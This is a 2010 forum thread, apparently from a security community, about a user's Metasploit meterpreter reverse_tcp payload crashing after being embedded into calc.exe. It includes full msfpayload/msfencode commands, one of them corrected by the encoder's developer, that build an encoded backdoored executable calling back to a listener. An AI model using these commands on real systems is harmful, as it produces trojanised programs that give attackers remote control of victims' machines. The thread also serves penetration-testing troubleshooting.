carloss Posted March 27, 2010

Hey, I just tried to put meterpreter into an already existing .exe file. I tried it with calc.exe and a quiz.exe which I programmed myself. In both cases it crashed on my Windows 7 machine (64bit); it crashed on my WinXP Pro (32bit) VM too. I used this command in BT4:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.126 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5

I also tried encoder x86/countdown... No change. Could someone help me please? :) I know I'm a noob :P

NUSHOR Posted March 28, 2010

hmm... what's that "R" doing after your LHOST?

carloss Posted March 30, 2010

I don't know what that does o_O :P It was in an article on LINK and I tried it with it. On BT4 it does the job without errors like expected, but the .exe which gets created does not work at all. It simply crashed. I tried calc, notepad and a C++ quiz made by me. Same result: all 3 crashed on Win7 64bit and XP 32bit.

Then I tried the command on BT3 with the calc, notepad and the quiz. Result: the quiz is working fine! Calc and Notepad are not! I don't understand why! O_O

scriptjunkie Posted April 3, 2010

> I don't know what that does o_O :P It was in an article on LINK and I tried it with it. On BT4 it does the job without errors like expected, but the .exe which gets created does not work at all. It simply crashed. I tried calc, notepad and a C++ quiz made by me. Same result: all 3 crashed on Win7 64bit and XP 32bit.
>
> Then I tried the command on BT3 with the calc, notepad and the quiz. Result: the quiz is working fine! Calc and Notepad are not! I don't understand why! O_O

Hey carloss,

I am scriptjunkie, and I just wrote that encoding method a few weeks ago (see https://www.metasploit.com/redmine/issues/1244 ). If it's really not working, I'd love to figure out why. Please upload your original and encoded executables. (If that doesn't work, email me; I'll message you my address if it's not already displayed somewhere.)

Edit: Be sure in the command to use EXITFUNC=thread. Are you using thread and not seh or process exitfunc? SEH will crash and process will kill the process. 64 bit will not work currently, but I don't know why XP 32 bit won't work. I have tested with as many exe's as I could, and solved as many bugs as I could, but some are not easily solved and I may have missed some. Did you get any error messages?

Thanks,
scriptjunkie

Edited April 5, 2010 by scriptjunkie

scriptjunkie Posted April 5, 2010

command:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.126 EXITFUNC=thread R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5

Edited April 5, 2010 by scriptjunkie